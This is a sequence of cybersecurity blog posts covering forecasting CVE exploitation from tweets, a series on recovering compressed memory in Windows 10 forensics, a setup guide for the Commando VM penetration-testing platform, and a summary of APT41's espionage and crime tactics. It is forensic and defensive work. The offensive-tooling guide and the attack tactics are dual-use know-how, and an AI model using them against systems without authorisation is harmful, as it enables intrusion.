Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.


Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately using tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).


Figure 1: Call to RtlDecompressBuferEx, note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).


Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000

0x1163

0x31001200

0x1423

0x20001400

“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.


Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is usedto perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.


Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.


Figure 6: Structure definition found within w10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both Volatily and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.


Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.


Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index in to nt!MmPagingFile (see Figure 3).


Figure 3: PTE of a compressed page in the virtual store an confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.


Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note, that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure or nt!SmGlobals needs to be located. This is a straightforward process if symbols are available (see Figure 5).


Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.


Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure) we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index in to the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.


Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.


Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete we found that our chunk key is 4b02d. Since it’s a compound value we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SHMP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.


Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.


Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.


Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1709 x64. The same techniques used here can be applied to Windows 10 1607 and onwards assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Resources

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) swept the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release made headway featuring more than 140 tools. Well now we are back again for another spectacular release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Window systems. The fewer Virtual Machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal such as starting up an SSH, MySQL or Apache server, automating mundane tasks with common scripting languages, and utilizing many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).


Figure 1: Kali XFCE on WSL with VcXsrv


Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv


Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv

Docker

Docker is becoming increasingly popular within the penetration testing community. Multiple blog posts exist detailing interesting functionality using Docker for pentesting. Based on its popularity Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with our release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.


Figure 4: Impacket container running on Docker

For command line docker containers, such as Amass, we created a PowerShell script to automatically run Amass commands through docker. This script is also added to the PATH, so users can call amass from anywhere. This script is shown in Figure 5. We encourage users to come up with their own scripts to do more creative things with Docker.


Figure 5: Amass.ps1 script

This script is also executed when the shortcut is opened.


Figure 6: Amass Docker container executed via PowerShell script

Customization

Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, maybe you would like to install additional reversing tools available within our popular FLARE VM; or you would prefer one of the many alternative text editors or browsers available from the chocolatey community feed. Either way, we would like to provide the option to selectively install only the packages you desire. Through customization you and your organization can also share or distribute the profile to make sure your entire team has the same VM environment. To provide for these scenarios, the last big change for Commando 2.0 is the support for installation customization. We recommend using our default profile, and removing or adding tools to it as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.

Simple Instructions

  1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.install.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script will now support an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 will install the default Commando VM distribution. To customize your edition of Commando VM, you need to create a profile in JSON format, and then pass that to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).


Figure 7: profile.json profile

This JSON profile starts with the env dictionary which specifies many environment variables used by the installer. These environment variables can, and should, be left to their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR environment variable specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable by default points to %SystemDrive%\Tools, allowing you to more easily access some tools on the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to do this is just download and extract the commando-vm zip file from GitHub.

With the packages variables set, you can now specify which packages to install on your own distribution. Some packages accept additional installation arguments. You can see an example of this by looking at the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your version of the profile named: myprofile.json (Figure 8).


Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.

Conclusion

Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

 


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

Announcing the Sixth Annual Flare-On Challenge

The FireEye Labs Advanced Reverse Engineering (FLARE) team is thrilled to announce that the popular Flare-On reverse engineering challenge will return for the sixth straight year. The contest will begin at 8:00 p.m. ET on Aug. 16, 2019. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Sept. 27, 2019.

This year’s contest will feature a total of 12 challenges covering a variety of architectures from x86 on Windows, .NET, Linux, and Android. Also, for the first time in Flare-On history, the contest will feature a NES ROM challenge. This is one of the only Windows-centric CTF contests out there and we have crafted it to represent the skills and challenges our FLARE team faces.

If you are skilled and dedicated enough to complete the Sixth Flare-On challenge, you will receive a prize and recognition on the Flare-On website for your accomplishment. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Previous prizes included belt buckles, a replica police badge, a challenge coin, and a huge pin.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon6

Finding Evil in Windows 10 Compressed Memory, Part One: Volatility and Rekall Tools

Paging all digital forensicators, incident responders, and memory manager enthusiasts! Have you ever found yourself at a client site working around the clock to extract evil from a Windows 10 image? Have you hit the wall at step zero, running into difficulties viewing a process tree, or enumerating kernel modules? Or even worse, had to face the C-Suite and let them know you couldn’t find any evil? Well fear no more – FLARE has you covered. We've analyzed Windows 10 and integrated our research into Volatility and  Rekall tools for your immediate consumption!

Until August 2013, as a skilled consultant, you were generally in good shape. Your tools worked as you expected them to and you were able to forensicate rapidly. Windows 8.1 introduced changes that began to break the tools we know and love. This breakdown largely went unnoticed as most companies continued using Windows 7, but now corporate environments are rolling out Windows 10 images at an ever-increasing pace and forensic tools haven’t kept up.

This blog post is the first in a three-part series covering our Windows 10 memory forensics research. This post coincides with Omar Sardar and Blaine Stancill’s presentation at SANS DFIR Austin 2019 and is designed to introduce you to FLARE’s updates to Volatility and Rekall. The next post will coincide with our BlackHat USA 2019 presentation, in which Omar Sardar and Dimiter Andonov will dig into the nitty-gritty details of the Windows 10 memory manager. The final post will serve as a guide to those seeking to analyze the kernel on their own.

Overview

Traditionally, a complete Windows memory analysis only required forensic tools to parse physical memory and fill in any missing gaps from the pagefile. In Windows 8.1 Microsoft upended this paradigm with the introduction of memory compression and a new virtual store designed to contain compressed memory. While current tools can inspect traditional pagefiles on disk just fine, the virtual store poses a challenge due to sparse documentation and data compression.

To enable a more complete memory analysis on Windows 10, FireEye’s FLARE team analyzed the operating system’s memory manager as well as the algorithms and structures used to retrieve compressed memory. The memory we’re looking for is stored in a virtual store, created by the Store Manager kernel component. The Store Manager is responsible for managing data involved in performance optimization systems, including SuperFetch, ReadyBoost, and ReadyDrive. In this case, the Virtual Store is a RAM-backed entity, leveraging storage space in MemCompression for processes’ compressed data. The results of this research have been ported to both Volatility and Rekall to benefit the security community.

Volatility and Rekall

Volatility and Rekall are two of the most popular open-source memory forensic frameworks available. With the introduction of Windows memory compression, both frameworks have been unable to read compressed pages – until now! The effects of compression were immediately noticeable as many plugins previously reported missing data or did not work altogether. To demonstrate, we will utilize a common plugin called modules that lists drivers loaded at the time of memory capture. In Figure 1, drivers loaded on the system are enumerated, but several paths to the files on disk are paged out to the compression store. These missing paths could very well be the evil you were hunting!


Figure 1: Volatility & Rekall missing data stored in compressed pages

To deal with missing data due to compressed pages, FireEye's FLARE team made multiple additions to Volatility and Rekall to support Windows 10 memory compression. First and foremost, we added the necessary overlays:

An overlay describes the internal data structures used by the Windows 10 memory compression algorithm and makes them available in Python. For example, the overlays define the layout of the SMKM_STORE structure and the B+Trees used to lookup compressed pages. These structures, among others, will be described in additional detail in Part Two of this blog series.

The undocumented Windows structures defined in the overlays are based on information we obtained through analyzing different versions of Windows 10. Being undocumented, these structures are susceptible to change across Windows builds, and even revisions. We currently support versions 1607, 1703, 1709, 1803, and 1809 on both 32-bit and 64-bit architectures. To support additional versions, the layout of the structures must be analyzed and the overlays updated accordingly. Analyzing the kernel to extract these structures will be discussed further in both Part Two and Part Three of this blog series.

The second modification to support compressed pages includes new address spaces for each framework:

Address spaces are responsible for satisfying memory read requests. When stacked on top of one another, each layer can translate the read request to an underlying base layer abstracting away the details of how the actual read is performed. An example translation is converting a virtual address to a physical address. Depending on the bottommost layer, the physical address may be an offset into a memory image, crash dump, or hibernate file. The takeaway is that an address space transparently resolves memory, regardless of its location and – most importantly – with zero effort on your part. Due to this seamless integration, users can interact with Volatility and Rekall just as before and, if a compressed page is detected, the new address spaces will take care of decompression in the background and return the decompressed data.

Back to our previous modules plugin example, Figure 2 demonstrates how the newly implemented address spaces properly decompress data located in compressed pages. No more hidden drivers or DLLs, among a plethora of other forensic artifacts. The data is now yours to continue your hunt for evil!


Figure 2: Volatility & Rekall decompressing compressed data

Get It Today

Head over to our Volatility and Rekall GitHub repositories to start using them today. After downloading or cloning the repositories, follow any necessary installation instructions as outlined on each GitHub's README page and start finding that evil!

Conclusion

